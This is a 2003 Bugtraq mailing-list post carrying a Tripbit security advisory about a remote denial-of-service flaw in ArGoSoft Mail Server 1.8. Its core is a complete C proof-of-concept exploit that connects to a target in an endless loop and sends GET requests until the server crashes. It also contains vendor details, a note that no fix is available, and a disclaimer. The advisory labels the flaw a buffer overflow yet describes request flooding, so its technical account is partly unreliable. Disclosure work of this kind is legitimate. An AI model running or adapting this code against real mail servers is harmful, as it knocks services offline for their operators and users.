[<prev] [next>] [day] [month] [year] [list]
Message-ID: <3EE7674C.7060607@tripbit.org>
Date: Wed, 11 Jun 2003 19:30:52 +0200
From: "Rushjo@...pbit.org" <rushjo@...pbit.org>
To: bugtraq@...urity-focus.com
Subject: Denial of Service Attack against ArGoSoft Mail Server Version 1.8
TA-2003-06 Denial of Service Attack against ArGoSoft Mail Server Version
1.8 (1.8.3.5)
contributed by: rushjo
======================================================================================
Tripbit Security Advisory
TA-2003-06 Denial of Service Attack against ArGoSoft Mail Server Version
1.8 (1.8.3.5)
======================================================================================
PROGRAM: ArGoSoft Mail Server
HOMEPAGE: http://www.argosoft.com
VULNERABLE VERSIONS: 1.8 (1.8.3.5)
NOT VULNERABLE VERSIONS: 1.8 Plus and 1.8 Prof
RISK: Medium
IMPACT: Denial of Service Attack
RELEASE DATE: 2003-06
======================================================================================
TABLE OF CONTENTS
======================================================================================
1..........................................................DESCRIPTION
2..............................................................DETAILS
3..............................................................EXPLOIT
4............................................................SOLUTIONS
5........................................................VENDOR STATUS
6..............................................................CREDITS
7...........................................................DISCLAIMER
8...........................................................REFERENCES
9.............................................................FEEDBACK
1. DESCRIPTION
======================================================================================
"ArGoSoft Mail Server is fully functional SMTP/POP3/Finger server for
Windows
95/98/Me/2k/XP, which will let you turn your computer into the email
system.
It's very compact, takes only about 1Mb of disk space, does not have any
specific
memory requirements, and what is the most important - it's very easy to use.
Currently we have three different versions of server: freeware, Plus and
Pro."
(This description is taken from the website of ArGo Software Design)
2. DETAILS
======================================================================================
ยค Remote DoS :
A security vulnerability in ArGoSoft Mail Server "Freeware" allows remote
attackers to crash the server by executing too much "get Request.
The command can be issued to the Mail server by everyone. The attacker
need no
authentification.
3. EXPLOIT
======================================================================================
This is an Proof of Concept Exploit of this Buffer Overflow Vul-
nerability.
NOTE: This is only for INFORMATION purposes and not for any
destructive acts!
/**********************************************************************************
*
* Denial of Service Attack against ArGoSoft Mail Server Version 1.8
(1.8.3.5)
*
* Tripbit Security Development
* ---------------------------------
*
* Author: posidron
*
* Contact
* [-] Mail: posidron@...pbit.org
* [-] Web: http://www.tripbit.org
* [-] Forum: http://www.tripbit.org/wbboard
* [-] IRC: irc.euirc.net 6667 #tripbit
*
* Greets: Rushjo, Tec, STeFaN, Havoc][, MisterMoe, PeaceTreaty
*
**********************************************************************************/
#include <stdio.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
int main(int argc, char *argv[])
{
int port, sockfd;
struct sockaddr_in server;
struct hostent *host;
char sendstring[1024];
strcpy(sendstring, "GET /index.html HTTP/1.0\n\n");
if(argc < 3)
{
printf("Usage: %s [target] <port>\n", argv[0]);
exit(0);
}
port = atoi(argv[2]);
host = gethostbyname(argv[1]);
if(host == NULL)
{
printf("Connection failed!...\n");
exit(0);
}
server.sin_family = AF_INET;
server.sin_port = htons(port);
server.sin_addr.s_addr = inet_addr((char*)argv[1]);
printf("Dos against ArGoSoft Mail Server Version 1.8 (1.8.3.5)\n");
for(;;)
{
if( (sockfd = socket(AF_INET,SOCK_STREAM,0)) < 0)
{
printf("socket() failed!\n");
exit(0);
}
if(connect(sockfd, (struct sockaddr*)&server, sizeof(server)) < 0)
{
printf("connect() failed!\n");
close(sockfd);
}
if (write(sockfd, sendstring, strlen(sendstring)) < 0)
{
break;
}
close(sockfd);
}
printf("Attack done!...\n");
}
This error will produce an "crash" of the ArGoSoft Mail Server.
4. SOLUTIONS
================================================================================
No solution for the moment.
5. VENDOR STATUS
================================================================================
The vendor has reportedly been notified but no answer of to this report.
6. CREDITS
================================================================================
Discovered by posidron
7. DISLAIMER
======================================================================
The information within this paper may change without notice. Use of
this information constitutes acceptance for use in an AS IS condition.
There are NO warranties with regard to this information. In no event
shall the author be liable for any damages whatsoever arising out of
or in connection with the use or spread of this information. Any use
of this information is at the user's own risk.
8. REFERENCES
======================================================================
- Original Version:
http://www.tripbit.org
9. FEEDBACK
======================================================================
Please send suggestions, updates, and comments to:
Tripbit Security Advisory
http://www.tripbit.org
rushjo@...pbit.org
posidron@...pbit.org
Powered by blists - more mailing lists